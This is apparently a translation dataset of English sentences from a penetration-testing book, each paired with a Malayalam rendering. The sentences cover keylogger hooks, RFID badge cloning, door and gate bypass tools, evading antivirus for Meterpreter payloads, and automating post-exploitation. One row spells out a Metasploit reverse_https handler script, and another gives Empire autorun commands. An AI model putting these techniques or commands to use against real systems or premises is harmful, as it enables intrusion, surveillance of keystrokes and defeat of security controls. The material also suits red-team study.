| {"en":"The goal of this project is to create a keylogger that utilizes C and low-level Windows functions to monitor keystrokes.","translation":"കീസ്ട്രോക്കുകൾ നിരീക്ഷിക്കാൻ C-യും, ലോ-ലെവൽ വിൻഡോസ് ഫംഗ്ഷനുകളും ഉപയോഗിക്കുന്ന ഒരു കീലോഗർ ഉണ്ടാക്കുക എന്നതാണ് ഈ പ്രോജക്റ്റിന്റെ ലക്ഷ്യം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"In this case, the WH_KEYBOARD_LL parameter will be used to pull low-level keyboard events.","translation":"ഈ സാഹചര്യത്തിൽ, കുറഞ്ഞ നിലയിലുള്ള കീബോർഡ് ഇവന്റുകൾ എടുക്കാൻ WH_KEYBOARD_LL എന്ന പാരാമീറ്റർ ഉപയോഗിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The function prototype for SetWindowsHookEx looks like this:","translation":"SetWindowsHookEx-ന്റെ ഫംഗ്ഷൻ പ്രോട്ടോടൈപ്പ് ഇങ്ങനെയാണ്:","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"The hook ID is an integer for the type of hook that you are going to install.","translation":"നിങ്ങൾ ഇൻസ്റ്റാൾ ചെയ്യാൻ പോകുന്ന ഹുക്കിന്റെ തരത്തിനായുള്ള ഒരു പൂർണ്ണസംഖ്യയാണ് ഹുക്ക് ID.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"This means that every time a key is pressed, the HOOKPROC will be called.","translation":"അതായത്, ഓരോ തവണയും ഒരു കീ അമർത്തുമ്പോൾ, HOOKPROC വിളിക്കപ്പെടും.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"This is the function that will be used to write the keystrokes to the file.","translation":"കീസ്ട്രോക്കുകൾ ഫയലിലേക്ക് എഴുതാൻ ഉപയോഗിക്കുന്ന ഫംഗ്ഷനാണിത്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"dwThreadId will be 0 to associate the callback with all of the threads on the desktop.","translation":"ഡെസ്ക്ടോപ്പിലെ എല്ലാ ത്രെഡുകളുമായും കോൾബാക്ക് ബന്ധിപ്പിക്കുന്നതിന് dwThreadId 0 ആയിരിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The second part that is required will be the callback function.","translation":"ആവശ്യമായ രണ്ടാമത്തെ ഭാഗം കോൾബാക്ക് ഫംഗ്ഷനായിരിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"The callback function will do the heavy lifting for this program.","translation":"ഈ പ്രോഗ്രാമിനായുള്ള പ്രധാന പ്രവർത്തനങ്ങൾ ചെയ്യുന്നത് കോൾബാക്ക് ഫംഗ്ഷനായിരിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The value of the lParam KBDLLHOOKSTRUCT is the vkCode or Virtual Key Code.","translation":"lParam KBDLLHOOKSTRUCT-ന്റെ മൂല്യം vkCode അല്ലെങ്കിൽ വെർച്വൽ കീ കോഡ് ആണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We can identify multiple entry points and areas where we might be able to get over the fence.","translation":"വേലിക്കരികിലൂടെ കടന്നുപോകുവാൻ സാധ്യതയുള്ള ഒന്നിലധികം പ്രവേശന കവാടങ്ങളും സ്ഥലങ്ങളും നമുക്ക് കണ്ടെത്താൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"With an initial walkthrough, we also identify some cameras, gates, entry points, and card reader systems.","translation":"ആരംഭ ഘട്ടത്തിൽ നടത്തിയ പരിശോധനയിൽ ചില ക്യാമറകൾ, ഗേറ്റുകൾ, പ്രവേശന കവാടങ്ങൾ, കാർഡ് റീഡർ സംവിധാനങ്ങൾ എന്നിവയും ഞങ്ങൾ തിരിച്ചറിഞ്ഞു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Card reader cloners were heavily covered in THP2, so I will mainly go into updates.","translation":"THP2-ൽ കാർഡ് റീഡർ ക്ലോണറുകളെക്കുറിച്ച് വിശദമായി പ്രതിപാദിച്ചിട്ടുണ്ട്, അതിനാൽ ഞാൻ പ്രധാനമായും പുതിയ വിവരങ്ങളിലേക്ക് കടക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"For the most part, HID badges that don't require any public/private handshakes are still vulnerable to clone and bruteforce ID numbers.","translation":"മിക്കവാറും, പൊതു/സ്വകാര്യ കൈമാറ്റം ആവശ്യമില്ലാത്ത HID ബാഡ്ജുകൾ ഇപ്പോഴും ക്ലോൺ ചെയ്യാനും ID നമ്പറുകൾ ബ്രൂട്ട്ഫോഴ്സ് ചെയ്യാനും സാധ്യതയുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"In THP2, we loved cloning ProxCard II badges as they don't have any protections, can be cloned easily, and cards are generally purchased in bulk incrementally, which allow for easy bruteforcing.","translation":"THP2-ൽ, പ്രൊട്ടക്ഷനുകളൊന്നും ഇല്ലാത്തതിനാലും, എളുപ്പത്തിൽ ക്ലോൺ ചെയ്യാൻ കഴിയുന്നതിനാലും, കാർഡുകൾ സാധാരണയായി കൂട്ടമായി വാങ്ങുന്നതിനാലും ProxCard II ബാഡ്ജുകൾ ക്ലോൺ ചെയ്യുന്നത് ഞങ്ങൾ ഇഷ്ടപ്പെട്ടു, ഇത് ബ്രൂട്ട്ഫോഴ്സിംഗിന് എളുപ്പമാക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"This was all done using the Proxmark3 device.","translation":"ഇതെല്ലാം Proxmark3 ഉപകരണം ഉപയോഗിച്ചാണ് ചെയ്തത്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Since then, a much more portable version of this device has been released called Proxmark3 RDV2 Kit.","translation":"അതിനുശേഷം, Proxmark3 RDV2 കിറ്റ് എന്ന് പേരുള്ള ഈ ഉപകരണത്തിന്റെ കൂടുതൽ പോർട്ടബിൾ പതിപ്പ് പുറത്തിറങ്ങിയിട്ടുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"This version can be configured with a battery and is much smaller than the original Proxmark3.","translation":"ഈ പതിപ്പ് ഒരു ബാറ്ററി ഉപയോഗിച്ച് കോൺഫിഗർ ചെയ്യാവുന്നതും യഥാർത്ഥ Proxmark3-നേക്കാൾ വളരെ ചെറുതുമാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Other common cards we come across: HID iClass (13.56 MHz) HID ProxCard (125 kHz) EM4100x (125 kHz) MIFARE Classic (13.56 MHz)","translation":"നാം സാധാരണയായി കാണുന്ന മറ്റ് കാർഡുകൾ: HID iClass (13.56 MHz) HID ProxCard (125 kHz) EM4100x (125 kHz) MIFARE Classic (13.56 MHz)","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Here is a great resource to check out by Kevin Chung: https://blog.kchung.co/rfid- hacking-with-the-proxmark-3/.","translation":"കെവിൻ ചുങ്ങിന്റെ ഈ മികച്ച resource പരിശോധിക്കുക: https://blog.kchung.co/rfid- hacking-with-the-proxmark-3/.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Physical Tools to Bypass Access Points We won't get into physical tools and how-tos, as that is an entire book and requires a great deal of experience.","translation":"പ്രവേശന പോയിന്റുകൾ മറികടക്കാനുള്ള ശാരീരിക ഉപകരണങ്ങൾ, ഒരുപാട് അനുഭവപരിചയം ആവശ്യമുള്ളതിനാൽ, ശാരീരിക ഉപകരണങ്ങളെക്കുറിച്ചും എങ്ങനെ ചെയ്യണമെന്നും നമ്മൾ വിശദീകരിക്കുന്നില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"As always, the best way to do physical assessments is to practice, build physical labs, and figure out what works and what doesn't.","translation":"എപ്പോഴും പറയുന്നതുപോലെ, ശാരീരിക വിലയിരുത്തലുകൾ നടത്താനുള്ള ഏറ്റവും നല്ല മാർഗ്ഗം പരിശീലിക്കുക, ശാരീരിക ലാബുകൾ നിർമ്മിക്കുക, എന്താണ് പ്രവർത്തിക്കുന്നതെന്നും എന്താണ് പ്രവർത്തിക്കാത്തതെന്നും കണ്ടെത്തുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"In terms of some cool tools that we have used in the past: Lock Picks (https://www.southord.com/) - SouthOrd has always been our go-to for lock picks.","translation":"കഴിഞ്ഞ കാലങ്ങളിൽ ഞങ്ങൾ ഉപയോഗിച്ച ചില മികച്ച ഉപകരണങ്ങൾ: ലോക്ക് പിക്കുകൾ (https://www.southord.com/) - ലോക്ക് പിക്കുകൾക്കായി സൗത്ത്ഓർഡ് എപ്പോഴും ഞങ്ങളുടെ പ്രിയപ്പെട്ട ഒന്നാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Great quality and works well.","translation":"മികച്ച ഗുണമേന്മയും നന്നായി പ്രവർത്തിക്കുകയും ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Gate Bypass Devices (https://www.lockpickshop.com/GATE-BYPASS.html) - Tool for getting around locked gates.","translation":"ഗേറ്റ് ബൈപാസ് ഉപകരണങ്ങൾ (https://www.lockpickshop.com/GATE-BYPASS.html) - പൂട്ടിയിട്ട ഗേറ്റുകൾ കടന്നുപോകാനുള്ള ഉപകരണം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Shove-it Tool (https://www.lockpickshop.com/SJ-50.html) - Simple tool if there is adequate space been a door and the latch.","translation":"ഷോവ്-ഇറ്റ് ഉപകരണം (https://www.lockpickshop.com/SJ-50.html) - വാതിലിനും കൊളുത്തി nonum ഇടയിൽ മതിയായ ഇടമുണ്ടെങ്കിൽ ലളിതമായ ഉപകരണം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Similar to the credit card swipe to open doors, you use the shove-it tool to go behind the plunger and pull back.","translation":"വാതിലുകൾ തുറക്കാൻ ക്രെഡിറ്റ് കാർഡ് സ്വൈപ്പ് ചെയ്യുന്നതുപോലെ, പ്ലഞ്ചറിന് പിന്നിൽ പോയി വലിക്കാൻ ഷോവ്-ഇറ്റ് ഉപകരണം ഉപയോഗിക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Under the Door 2.0 (https://shop.riftrecon.com/products/under-the-door-tool) – Tool for doors that have the lever handle.","translation":"അണ്ടർ ദി ഡോർ 2.0 (https://shop.riftrecon.com/products/under-the-door-tool) - ലിവർ ഹാൻഡിൽ ഉള്ള വാതിലുകൾക്കായുള്ള ഉപകരണം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"We can use the Under the Door tool to literally go under the door, wrap around the lever handle, and pull down.","translation":"വാതിലിനടിയിലൂടെ കടന്നുപോവാനും, ലിവർ ഹാൻഡിലിന് ചുറ്റും ചുറ്റി, താഴേക്ക് വലിക്കാനും അണ്ടർ ദി ഡോർ ഉപകരണം ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Back in the day, these were commonly found in hotels, but we definitely do come across them in businesses, too.","translation":"പണ്ട്, ഇവ സാധാരണയായി ഹോട്ടലുകളിൽ കാണാറുണ്ടായിരുന്നു, എന്നാൽ ബിസിനസ്സുകളിലും ഞങ്ങൾ ഇത് കാണാറുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"You would want to create your own send and recv wrappers, which decrypt/encrypt before calling the send and recv functions.","translation":"send, recv എന്നിവയുടെ സ്വന്തം റാപ്പറുകൾ ഉണ്ടാക്കാൻ നിങ്ങൾ ആഗ്രഹിക്കുന്നു, അത് send, recv ഫംഗ്ഷനുകൾ വിളിക്കുന്നതിന് മുമ്പ് ഡീക്രിപ്റ്റ് ചെയ്യുകയും എൻക്രിപ്റ്റ് ചെയ്യുകയും ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"An extremely easy way to do this would be to use a multi byte XOR key, which while not very secure, would at least change your messages enough to not be easily identifiable.","translation":"ഇത് ചെയ്യുന്നതിനുള്ള ഏറ്റവും എളുപ്പവഴി, മൾട്ടി ബൈറ്റ് XOR കീ ഉപയോഗിക്കുക എന്നതാണ്, ഇത് വളരെ സുരക്ഷിതമല്ലാത്തപ്പോൾ പോലും, നിങ്ങളുടെ സന്ദേശങ്ങൾ എളുപ്പത്തിൽ തിരിച്ചറിയാൻ കഴിയാത്ത രീതിയിൽ മാറ്റം വരുത്തും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Another exercise could be to extend the LoadBlobHandler() function to have a new LOAD_TYPE, which would load a signed driver if the client is being run as administrator.","translation":"മറ്റൊരു പരിശീലനം LoadBlobHandler() ഫംഗ്ഷൻ ഒരു പുതിയ LOAD_TYPE-ലേക്ക് വികസിപ്പിക്കുക എന്നതാണ്, ഇത് ക്ലയിന്റ് അഡ്മിനിസ്ട്രേറ്ററായി പ്രവർത്തിപ്പിക്കുകയാണെങ്കിൽ ഒപ്പിട്ട ഡ്രൈവർ ലോഡ് ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Be aware that this is going to be a little more advanced and you will most likely run into some issues during compile time.","translation":"ഇത് അൽപ്പം കൂടി വിപുലമായ ഒന്നായിരിക്കുമെന്നും കംപൈൽ സമയത്ത് ചില പ്രശ്നങ്ങളുണ്ടാകുമെന്നും ഓർക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"There are plenty of great tools like Metasploit/Meterpreter out there, but every antivirus and network intrusion detection (NID) tool has developed signatures for it.","translation":"Metasploit/Meterpreter പോലുള്ള ധാരാളം മികച്ച ടൂളുകൾ അവിടെയുണ്ട്, എന്നാൽ എല്ലാ ആന്റിവൈറസും നെറ്റ്വർക്ക് നുഴഞ്ഞുകയറ്റ കണ്ടെത്തൽ (NID) ഉപകരണവും ഇതിനായി ഒപ്പുകൾ വികസിപ്പിച്ചെടുത്തിട്ടുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We can try to obfuscate payloads with Shikata Ga Nai and go over HTTPS, but that only goes so far.","translation":"Shikata Ga Nai ഉപയോഗിച്ച് പേലോഡുകൾ മറയ്ക്കാനും HTTPS വഴി പോകാനും ശ്രമിക്കാം, പക്ഷേ അത് വളരെ ദൂരം പോകില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Any type of obfuscation will generally have a stub signature to detect off of, AV will look into memory for certain strings in certain locations, and networks perform man-in-the-middle inspection over HTTPS.","translation":"ഏത് തരത്തിലുള്ള മറയ്ക്കലും സാധാരണയായി കണ്ടെത്താൻ ഒരു സ്റ്റബ് സിഗ്നേച്ചർ ഉണ്ടാകും, AV ചില ലൊക്കേഷനുകളിലെ ചില സ്ട്രിംഗുകൾക്കായി മെമ്മറിയിൽ തിരയും, കൂടാതെ നെറ്റ്വർക്കുകൾ HTTPS വഴി മാൻ-ഇൻ-മിഡിൽ പരിശോധന നടത്തും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"So how can we do to keep using our favorite tools, while getting around all the common protections?","translation":"അപ്പോൾ, സാധാരണ സംരക്ഷണങ്ങളെല്ലാം മറികടന്ന് നമ്മുടെ പ്രിയപ്പെട്ട ടൂളുകൾ എങ്ങനെ ഉപയോഗിക്കാം?","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's take the example of Metasploit/Meterpreter and see how we can bypass all these hurdles.","translation":"Metasploit/Meterpreter-ൻ്റെ ഉദാഹരണം എടുത്ത് ഈ തടസ്സങ്ങളെല്ലാം എങ്ങനെ മറികടക്കാമെന്ന് നോക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Our goals are to get around AV signatures on the binary, AV signatures in memory, and network signatures.","translation":"ബൈനറിയിലെ AV സിഗ്നേച്ചറുകൾ, മെമ്മറിയിലെ AV സിഗ്നേച്ചറുകൾ, നെറ്റ്വർക്ക് സിഗ്നേച്ചറുകൾ എന്നിവ ഒഴിവാക്കുക എന്നതാണ് നമ്മുടെ ലക്ഷ്യങ്ങൾ.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"First, we need to modify the Meterpreter payloads to make sure they aren't easily detected with signatures both on the network and in memory.","translation":"ഒന്നാമതായി, നെറ്റ്വർക്കിലും മെമ്മറിയിലും ഒപ്പുകൾ ഉപയോഗിച്ച് എളുപ്പത്തിൽ കണ്ടെത്താൻ കഴിയാത്ത രീതിയിൽ Meterpreter പേലോഡുകൾ പരിഷ്കരിക്കേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Second, we modify the metsvc persistence module to prevent it from flagging anti-virus.","translation":"രണ്ടാമതായി, ആന്റി-വൈറസിനെ ഫ്ലാഗ് ചെയ്യുന്നത് തടയാൻ metsvc നിലനിൽപ്പ് മൊഡ്യൂൾ പരിഷ്കരിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Third, we compile portions of metsrv (the actual Meterpreter payload) with Clang, to prevent it also from flagging anti-virus signatures.","translation":"മൂന്നാമതായി, ആന്റി-വൈറസ് സിഗ്നേച്ചറുകൾ ഫ്ലാഗ് ചെയ്യുന്നത് തടയാൻ metsrv-ൻ്റെ ഭാഗങ്ങൾ (യഥാർത്ഥ Meterpreter പേലോഡ്) Clang ഉപയോഗിച്ച് കംപൈൽ ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Last, we will write our own stage0 payload, which downloads and executes Meterpreter, to bypass all anti-virus.","translation":"അവസാനമായി, എല്ലാ ആന്റി-വൈറസുകളും മറികടക്കാൻ, Meterpreter ഡൗൺലോഡ് ചെയ്യുകയും എക്സിക്യൂട്ട് ചെയ്യുകയും ചെയ്യുന്ന ഞങ്ങളുടെ സ്വന്തം stage0 പേലോഡ് ഞങ്ങൾ എഴുതും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Compiling metsrv (network service wrapper for Meterpreter) with Clang and remove metsrv/metsvc-server references: http://bit.ly/2H2kaUB","translation":"Clang ഉപയോഗിച്ച് metsrv (Meterpreter-നുള്ള നെറ്റ്വർക്ക് സേവന റാപ്പർ) കംപൈൽ ചെയ്യുക, കൂടാതെ metsrv/metsvc-server റഫറൻസുകൾ നീക്കം ചെയ്യുക: http://bit.ly/2H2kaUB","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Modifying Payloads to get rid of strings like Mimikatz http://bit.ly/2IS9Hvl","translation":"Mimikatz പോലുള്ള സ്ട്രിംഗുകൾ ഒഴിവാക്കാൻ പേലോഡുകൾ പരിഷ്കരിക്കുന്നു http://bit.ly/2IS9Hvl","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Modified Reflective DLL Injection to remove strings like ReflectiveLoader http://bit.ly/2qyWfFK","translation":"ReflectiveLoader പോലുള്ള സ്ട്രിംഗുകൾ നീക്കം ചെയ്യാൻ പരിഷ്കരിച്ച പ്രതിഫലന DLL ഇൻജക്ഷൻ http://bit.ly/2qyWfFK","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Many network products detect the stage 0/1/2 loaders of Meterpreter as they go across the wire.","translation":"മീറ്റർപ്രട്ടറിൻ്റെ 0/1/2 ലോഡറുകൾ വയറിലൂടെ കടന്നുപോകുമ്പോൾ പല നെറ്റ്വർക്ക് ഉൽപ്പന്നങ്ങളും കണ്ടെത്തുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Besides obfuscating our payload, we can also obfuscate the actual shellcode.","translation":"ഞങ്ങളുടെ പേലോഡ് മറയ്ക്കുന്നതിനു പുറമെ, യഥാർത്ഥ ഷെൽകോഡും മറയ്ക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"One example is to go through all the Ruby files for the different payload types and add random nop sleds to avoid detection: http://bit.ly/2JKUhdx","translation":"ഒരു ഉദാഹരണമായി, വ്യത്യസ്ത പേലോഡ് തരങ്ങൾക്കായി എല്ലാ റൂബി ഫയലുകളിലൂടെയും കടന്നുപോയി കണ്ടെത്തൽ ഒഴിവാക്കാൻ ക്രമരഹിതമായ നോപ് സ്ലെഡുകൾ ചേർക്കുക: http://bit.ly/2JKUhdx","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"In the next section, we will go over some quick auto-run scripts that can help automate some of our attacks.","translation":"അടുത്ത ഭാഗത്ത്, ഞങ്ങളുടെ ചില ആക്രമണങ്ങൾ ഓട്ടോമേറ്റ് ചെയ്യാൻ സഹായിക്കുന്ന ചില പെട്ടന്നുള്ള ഓട്ടോ-റൺ സ്ക്രിപ്റ്റുകളെക്കുറിച്ച് ഞങ്ങൾ ചർച്ച ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Automating Metasploit with RC scripts With Metasploit, we can efficiently and effectively run our post-exploitation scripts using:","translation":"ആർസി സ്ക്രിപ്റ്റുകൾ ഉപയോഗിച്ച് മെറ്റാസ്പ്ലോയിറ്റ് ഓട്ടോമേറ്റ് ചെയ്യുന്നു: മെറ്റാസ്പ്ലോയിറ്റ് ഉപയോഗിച്ച്, ഞങ്ങൾക്ക് പോസ്റ്റ്-എക്സ്പ്ലോയിറ്റേഷൻ സ്ക്രിപ്റ്റുകൾ കാര്യക്ഷമമായും ഫലപ്രദമായും പ്രവർത്തിപ്പിക്കാൻ കഴിയും:","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Search all Post Exploitation Modules in Metasploit msfconsole show post From the “post” results, select all the modules you want to include for auto-execution when receiving a Meterpreter Shell.","translation":"മെറ്റാസ്പ്ലോയിറ്റിലെ എല്ലാ പോസ്റ്റ് എക്സ്പ്ലോയിറ്റേഷൻ മൊഡ്യൂളുകളും തിരയുക: msfconsole show post \"post\" ഫലങ്ങളിൽ നിന്ന്, ഒരു മീറ്റർപ്രറ്റർ ഷെൽ ലഭിക്കുമ്പോൾ ഓട്ടോ-എക്സിക്യൂഷനായി ഉൾപ്പെടുത്താൻ ആഗ്രഹിക്കുന്ന എല്ലാ മൊഡ്യൂളുകളും തിരഞ്ഞെടുക്കുക.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"In this case, we are going to add a privilege migrate post exploitation (http://bit.ly/2vn1wFB) to our attack.","translation":"ഈ സാഹചര്യത്തിൽ, ഞങ്ങളുടെ ആക്രമണത്തിലേക്ക് ഒരു പ്രിവിലേജ് മൈഗ്രേറ്റ് പോസ്റ്റ് എക്സ്പ്ലോയിറ്റേഷൻ (http://bit.ly/2vn1wFB) ചേർക്കാൻ പോകുകയാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"To configure the Meterpreter Shell so that it runs this payload on the initial connection from our compromised host, we need to specify an AutoRunScript parameter.","translation":"മെറ്റീരിയൽ ഷെൽ കോൺഫിഗർ ചെയ്യുന്നതിന്, ഞങ്ങളുടെ വിട്ടുവീഴ്ച ചെയ്ത ഹോസ്റ്റിൽ നിന്നുള്ള പ്രാരംഭ കണക്ഷനിൽ ഈ പേലോഡ് പ്രവർത്തിപ്പിക്കാൻ, ഒരു ഓട്ടോറൺസ്ക്രിപ്റ്റ് പാരാമീറ്റർ വ്യക്തമാക്കേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Feel free to add as many AutoRunScripts as you need to dump information about the system/network, move laterally, and more!","translation":"സിസ്റ്റം/നെറ്റ്വർക്കിനെക്കുറിച്ചുള്ള വിവരങ്ങൾ ശേഖരിക്കാനും, ലാറ്ററലായി നീങ്ങാനും, മറ്റു പല കാര്യങ്ങൾക്കുമായി നിങ്ങൾക്ക് ആവശ്യമുള്ളത്രയും AutoRunScripts ചേർക്കാൻ മടിക്കരുത്!","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Create a handler file gedit handler.rc Configure the handler and autorun scripts use multi/handler set payload windows/meterpreter/reverse_https set LHOST 10.100.100.9 set LPORT 443 set AutoRunScript post/windows/manage/priv_migrate set ExitOnSession false set EnableStageEncoding true exploit -j Start handler msfconsole -r handler.rc","translation":"ഒരു ഹാൻഡ്ലർ ഫയൽ ഉണ്ടാക്കുക: gedit handler.rc ഹാൻഡ്ലറും ഓട്ടോറൺ സ്ക്രിപ്റ്റുകളും കോൺഫിഗർ ചെയ്യുക: multi/handler ഉപയോഗിക്കുക, പേലോഡ് സജ്ജീകരിക്കുക windows/meterpreter/reverse_https, LHOST 10.100.100.9 സജ്ജീകരിക്കുക, LPORT 443 സജ്ജീകരിക്കുക, AutoRunScript post/windows/manage/priv_migrate സജ്ജീകരിക്കുക, ExitOnSession false സജ്ജീകരിക്കുക, EnableStageEncoding true സജ്ജീകരിക്കുക, exploit -j പ്രവർത്തിപ്പിക്കുക, msfconsole -r handler.rc ഉപയോഗിച്ച് ഹാൻഡ്ലർ ആരംഭിക്കുക.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Automating Empire Empire has similar features to Metasploit’s resource files, which automate many of the repetitive tasks.","translation":"എംപയർ ഓട്ടോമേറ്റ് ചെയ്യുന്നു: മെറ്റാസ്പ്ലോയിറ്റിന്റെ റിസോഴ്സ് ഫയലുകളോട് സാമ്യമുള്ള ഫീച്ചറുകൾ എംപയറിനുണ്ട്, ഇത് ആവർത്തിച്ചുള്ള പല ജോലികളും ഓട്ടോമേറ്റ് ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"First, we need to create a file (in our example, we will create a file called /opt/empire_autoload.rc) and then load it within our Empire instance.","translation":"ആദ്യം, നമ്മൾ ഒരു ഫയൽ ഉണ്ടാക്കണം (നമ്മുടെ ഉദാഹരണത്തിൽ, /opt/empire_autoload.rc എന്ന് പേരുള്ള ഒരു ഫയൽ ഉണ്ടാക്കും), തുടർന്ന് അത് നമ്മുടെ എംപയർ ഇൻസ്റ്റൻസിൽ ലോഡ് ചെയ്യുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"In a separate terminal window, create a handler file: gedit /opt/empire_autoload.rc Add all the post modules you want to execute:","translation":"പ്രത്യേക ടെർമിനൽ വിൻഡോയിൽ, ഒരു ഹാൻഡ്ലർ ഫയൽ ഉണ്ടാക്കുക: gedit /opt/empire_autoload.rc നിങ്ങൾ എക്സിക്യൂട്ട് ചെയ്യാൻ ആഗ്രഹിക്കുന്ന എല്ലാ പോസ്റ്റ് മൊഡ്യൂളുകളും ചേർക്കുക:","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"usemodule situational_awareness/network/powerview/get_user execute back usermodule situational_awareness/network/powerview/get_computer execute back Within Empire, load the autoload.rc resource file:","translation":"usemodule situational_awareness/network/powerview/get_user execute back usermodule situational_awareness/network/powerview/get_computer execute back എംപയറിനുള്ളിൽ, autoload.rc റിസോഴ്സ് ഫയൽ ലോഡ് ചെയ്യുക:","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"agents autorun /opt/empire_autoload.rc powershell autorun show As you can see, when the agent connected, it automatically ran the get_user and get_computer PowerShell scripts.","translation":"ഏജന്റ്സ് autorun /opt/empire_autoload.rc powershell autorun show നിങ്ങൾക്ക് കാണാനാകുന്നതുപോലെ, ഏജന്റ് കണക്ട് ചെയ്യുമ്പോൾ, അത് get_user, get_computer PowerShell സ്ക്രിപ്റ്റുകൾ സ്വയമേവ പ്രവർത്തിപ്പിച്ചു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"All the results of these scripts will be stored in the agent.log file.","translation":"ഈ സ്ക്രിപ്റ്റുകളുടെ എല്ലാ ഫലങ്ങളും agent.log ഫയലിൽ സംഭരിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"In this case, our agent name is N6LM348G, so our logs will be stored in /opt/Empire/downloads/N6LM348G/agent.log.","translation":"ഈ സാഹചര്യത്തിൽ, ഞങ്ങളുടെ ഏജന്റ് നാമം N6LM348G ആണ്, അതിനാൽ ഞങ്ങളുടെ ലോഗുകൾ /opt/Empire/downloads/N6LM348G/agent.log-ൽ സംഭരിക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Automating Cobalt Strike One of the main reasons that Cobalt Strike is so powerful is because of the Aggressor Scripts (https://www.cobaltstrike.com/aggressor-script/index.html).","translation":"കോബാൾട്ട് സ്ട്രൈക്ക് ഓട്ടോമേറ്റ് ചെയ്യുന്നു: കോബാൾട്ട് സ്ട്രൈക്ക് ഇത്രയധികം ശക്തമാകാനുള്ള പ്രധാന കാരണങ്ങളിലൊന്ന് അഗ്രസ്സർ സ്ക്രിപ്റ്റുകളാണ് (https://www.cobaltstrike.com/aggressor-script/index.html).","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
